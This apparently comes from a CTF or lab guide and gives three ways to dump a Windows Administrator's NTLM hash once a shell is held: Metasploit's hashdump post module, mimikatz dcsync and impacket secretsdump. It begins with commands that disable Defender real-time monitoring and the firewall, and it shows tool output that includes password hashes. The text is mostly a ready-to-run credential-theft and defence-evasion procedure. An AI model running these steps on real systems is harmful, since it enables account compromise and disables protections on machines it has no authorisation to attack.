Using Metasploit-Hashdump
After getting shell as administrator
Do these things.
First disable the real time protection
if its enabled
1
Set-MpPreference -DisableRealtimeMonitoring $true
Then disable the Anti-Virus
protection
1
netsh advfirewall set currentprofile state off
- get a meterpreter shell on the particular Machine
Background the session with ctrl+z
1
2
meterpreter >
Background session 1? [y/N] y
Load the module post/windows/gather/hashdump
1
msf5 exploit(multi/handler) > use post/windows/gather/hashdump
List your background sessions
1
2
3
4
5
6
7
8
msf5 post(windows/gather/hashdump) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ MACHINE 10.10.14.X:2345 -> 10.10.10.X:49696 (10.10.10.X)
Set your session and run the module
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf5 post(windows/gather/hashdump) > set session 1
session => 1
msf5 post(windows/gather/hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d132fb96a18c6ee06dee89f8effb8e06...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97fc053bc0b23588798277b22540c40d:::
[*] Post module execution completed
The hash is divided into 2 parts First one is LM
and second one is NTLM
NTLM
hash is 97fc053bc0b23588798277b22540c40d
Just copy paste the NTLM
hash in the writeup where i asked for it
Using mimikatz
After getting shell as administrator
Do these things.
First disable the real time protection
if its enabled
1
Set-MpPreference -DisableRealtimeMonitoring $true
Then disable the Anti-Virus
protection
1
netsh advfirewall set currentprofile state off
Then run the mimikatz
with following arguments
1
./mimikatz.exe "lsadump::dcsync /user:administrator"
You can download mimikatz
from Here
You will get output like this
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"
.#####. mimikatz 2.2.0 (x86) #18362 Feb 8 2020 12:26:09
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 1/24/2020 9:14:15 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
And the NTLM
hash we got is f9485863c1e9e05851ab40cbb5ab9dff
Just copy paste it in the writeup
where i asked for it.
Using Secretdump
If you have owned a machine.And you have the user Administrator's
password ,You can get the NTLM hashes of user Administrator using secrectdump
.Secretdump is a tool from impacket-tools
1
2
3
4
5
6
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
The hash is divided into two sections first
LM hash and second one is NTLM
.
Here we got the NTLM
which is d9485863c1b9e07543aa40cbb4ab9dfd
Just copy paste it in the writeup
where i asked for it.